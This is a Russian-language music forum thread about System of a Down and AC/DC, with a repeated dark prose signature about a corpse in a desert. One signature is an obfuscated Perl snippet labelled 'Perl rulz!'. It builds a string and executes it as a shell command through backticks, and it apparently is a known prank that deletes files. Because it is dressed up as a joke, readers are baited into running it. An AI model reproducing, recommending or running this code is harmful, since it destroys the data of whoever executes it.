Да кто ж не знает?
Когда у меня играла песня Rocker на информатике,учительница сказала,чтобы я выключил эту депрессивную музыку. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
А все видели Шаво в их клипе на ост к фильму шварценегера последний киногерой кажется big gun? _________________ Everybody like to be
in my place instead of me
cause I?m the king of Bongo
baby I?m the king of Bongo Bong
Кстати,кому как сравнительно новый альбом? _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
никогда особо не нравилось _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Австралийское новостное агентство The Age сообщило, что легендарные рокеры AC/DC возглавили список австралийских знаменитостей этого года среди тех, кто заработал больше всех средств. Список опубликован в финансовом издании BRW.
Группа выбила с первого места WIGGLES и возглавила Top 50, заработав 105 миллионов австралийских долларов (примерно 95 миллионов долларов США), что в девять раз больше показателя прошлого года.
?Они всегда были в списке, но сейчас вместо 12 миллионов у них 105, так что они просто сравняли всех с землей?, ? сказала журналистка издания BRW Jane Lindhe.
Lindhe заявила, что стратегия группы не продавать билеты дороже 150 австралийских долларов на свои выступления по всему миру принесли подобные результаты.
Если их выбили с первого места,у меня вопрос,как эти укурки туда попали?Хотя,ладно,я догадываюсь,что это,наверное,что-то вроде популярной детской передачи.Но думать,что они наркоманы куда веселее. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.